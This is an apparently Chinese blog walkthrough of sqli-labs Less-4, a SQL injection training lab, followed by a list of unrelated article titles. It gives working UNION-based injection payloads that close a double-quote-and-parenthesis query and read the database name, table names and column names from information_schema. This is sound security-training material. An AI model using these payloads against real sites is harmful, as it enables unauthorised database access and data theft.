less-4
2024-09-04 03:26:19
首先来了解语句构造方法:
输入id=1’显示正确,输入id=1”显示错误(如下图),可以看到后面有个),说明这里跟前面less-3一样,也是用)来闭合,只不过这里从单引号变成了双引号
输入id=1”)--+成功执行(如下图),所以接下来我们就可以输入执行代码了
爆数据库:
id=-1")%20union%20select%201,2,database()--+
爆表
id=-1")%20union%20select%201,2,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1)--+
爆字段
id=-1")%20union%20select%201,2,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27emails%27%20limit%200,1)--+
最新文章
- sqlyog导出json数据格式支持mysql数据转存mongodb
- json序列化及反序列化
- Atitit attilax总结的对于attilax重要的jsr规范,以及需要增加的jsr规范
- mysql语句:批量更新多条记录的不同值[转]
- MySQL 备份与还原详解
- discuz如何设置游客可以浏览板块,但是不能查看帖子内容呢?
- P107、面试题15:链表中倒数第K个结点
- Java serialVersionUID
- Catch That Cow
- EasyUI - NumberSpinner 组件
- Python:开发Sublime插件,方便PHP开发
- ShellExecute快捷键大全
- Bootstrap入门(五)表单
- CSS3 @keyframes 用法(简单动画实现)
- Python处理Excel生成CSV文档
- datetimepicker日期框选择后,无法触发bootstrapValidator
- 排序算法之快速排序的思想以及Java实现
- elbow 求拐点
- javax/servlet/jsp/jstl/core/Config
- 转-软件测试人员在工作中如何运用Linux